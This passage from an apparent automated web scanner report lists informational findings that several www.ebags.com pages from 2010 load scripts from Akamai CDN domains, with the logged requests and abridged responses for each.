<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js'></script>
...[SNIP]...

5.35. http://www.ebags.com/department/sale previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/sale

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /department/sale HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:40 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:40 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 86994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.36. http://www.ebags.com/department/snow-and-skate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/snow-and-skate

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js

Request

GET /department/snow-and-skate HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:31 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:31 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 62315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
...[SNIP]...

5.37. http://www.ebags.com/department/sports-and-duffels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/sports-and-duffels

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js

Request

GET /department/sports-and-duffels HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:16 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:16 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 70551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js'></script>
...[SNIP]...

5.38. http://www.ebags.com/department/travel-accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/travel-accessories

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /department/travel-accessories HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:19 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:19 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 72376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.39. http://www.ebags.com/department/wallets-and-accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/wallets-and-accessories

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /department/wallets-and-accessories HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:22 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:22 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.40. http://www.ebags.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /help/ HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:21 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D7C4E0%5C710F0A6ABDF; expires=Sun, 02-Jan-2011 14:04:21 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.41. http://www.ebags.com/help/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /help/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:58 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:58 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.42. http://www.ebags.com/info/Compare/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/Compare/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
